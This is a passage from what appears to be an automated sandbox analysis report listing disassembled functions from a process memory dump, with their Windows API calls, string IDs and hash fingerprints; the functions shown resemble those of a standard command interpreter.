                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2966e31612bd8e17abc4b69c2d5de50fa611ff5b7593c291ac0b5fd3b4e653ce
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26319130304205ABFB229B65DC8ABBF36AEEF41351F608135F902D6291DBB8DD519662
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003832A Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00038360
                                                                                                                                                                                                                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 00038376
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0003838B
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 000383A0
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 000383D8
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 0003840C
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: (#$Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3377411628-593978566
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cf3442d0d443ecf00dc127aff7d709ac673c61704071922e431fd0aff2f216c5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5735bad300c1be0ce65af4869a6abc50424d38c55e35c1ecd74c0ff8b76994b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3442d0d443ecf00dc127aff7d709ac673c61704071922e431fd0aff2f216c5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22315A71A00308ABEB219FA5DC44DEEBBBDEB49711F104229F901E7291EB749A41CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00025271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00025294
                                                                                                                                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 000252A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031036
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031048
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031064
                                                                                                                                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031073
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$\
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4cb74794876cd34de09f5be0eb19f9f4fe807486a1fa0b22be1560ca07a04f81
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c4c0ae4d36ed02d75bebeacd0c9fcd65d054e82b928e59300fee8c1056fab1dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb74794876cd34de09f5be0eb19f9f4fe807486a1fa0b22be1560ca07a04f81
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F11C635A10724EB97615B34AC48ABF77FCEF47766B040218E812D21D0EB78CD8992A6
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00021665
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00021689
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 000216AD
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 000216D1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000217CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000217E9
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00021801
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00021813
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 00022650
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 44200ad9c09bee468493f2c56e91bc42a2976212c7ee82651831ce0bf71c9b46
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d0da58e11ccfaab3464b398a41cad318404e010db6c2a59684fd7f0ffc8097f8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44200ad9c09bee468493f2c56e91bc42a2976212c7ee82651831ce0bf71c9b46
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F18D71A042699BDB64DF25DC85AEABBF4FF58304F1441A9E849D7242EB34DE80CF90
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000345F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00039E02,?,?,00039E02), ref: 00034618
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034637
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004A7F0,00039E02,?,00000000,?,00039E02), ref: 00034646
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034653
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(0004A7F0,000134F8,00000003), ref: 00034693
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00039E02,00000000,?,00039E02,?,00039E02), ref: 00034720
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00039E02,00000000,00000000,?,00039E02), ref: 00034742
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 0003474F
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F1,00000001,?,00000000,?,00039E02), ref: 00034764
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034771
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2002953238-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ece81f19d48ec123ec72a0e5a4bbf0de04f851b46608858f9f942df29b8a39fd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8432433ad38ca563ecba2c8502a158d50b3d481f5be718eb81833ee7f1bd18c9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece81f19d48ec123ec72a0e5a4bbf0de04f851b46608858f9f942df29b8a39fd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51E171A04204AFEB628F68CC4ABAEBBBDEB42311F184129E911DF290D7B45D40CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0004A7F0,00000000,?,00000200), ref: 0001C818
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001C882
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001C8BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001C8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001C8DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001C8ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0001C90D
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001C91E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004A7F0,00000200,00000000,00000000), ref: 0001C934
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001C941
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001CAC4
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001CACE
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(0004A7F0,000134F8,00000003), ref: 0002D16E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1383533039-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 442cdc8a85a230d729aef810dc4d8e3a00ac7b4f23fb2745418a6ba8e47f8de7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7cb70494f5e8d559bd093200e83691f073dcf623b500244b19ff1a501442b13d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 442cdc8a85a230d729aef810dc4d8e3a00ac7b4f23fb2745418a6ba8e47f8de7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5411670A403189BFB708B149C8DBEA77B6AF45305F5401A9F509A71D0CBB98DD1CF56
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00020444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a69eb7655b91b62f7c5a4af9207f04eedd31ac08eed6f10b3f38e9602fdf0906
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dd2b1b5c3a00dc0d19dd9378bae4575d109e8c8d0ab7839568e00acd7b776721
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69eb7655b91b62f7c5a4af9207f04eedd31ac08eed6f10b3f38e9602fdf0906
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021EAB12487259AFB782B64BC167BF26DCDB85355F24441EF546854C3EEB888808B26
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019EF2 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00019F3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001A02D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001A03F
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 0001A0E8
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3784859044-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ec3d5e5411aed1a8512e7109111d6e8245df1eda845c04934fa1655c80615f19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08605ff21b73101908fb757500eb22686bf20adad808c42fa2a0ae053cf72943
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3d5e5411aed1a8512e7109111d6e8245df1eda845c04934fa1655c80615f19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A10431A01211ABD735AF78D855AFFB3F5EF89720B24861DE45693291DB30EC81CB92
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00034953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00034A7B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00034B98
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00034BC5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00034BD2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00034BDC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00034C30
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$/-.
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033501010-531045382
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2ee2e0595b8667b3a6f0c8205032b1b311eaccb4b4a8368eb87ee2b60a69895
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ca6923a9b5e67dcbf9bbbde9bc3ac0ef43b066360e3bd28c8a9f87542c75c04b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2ee2e0595b8667b3a6f0c8205032b1b311eaccb4b4a8368eb87ee2b60a69895
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6813432A4021596DB669A78CC46BFF73ECEF84700F10416AE402DF290EB75EE848615
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00036650 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00036745
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 000367CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000367F6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000120B8,00000000,00000002,?,00000000), ref: 00036867
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 000368A3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000368C5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
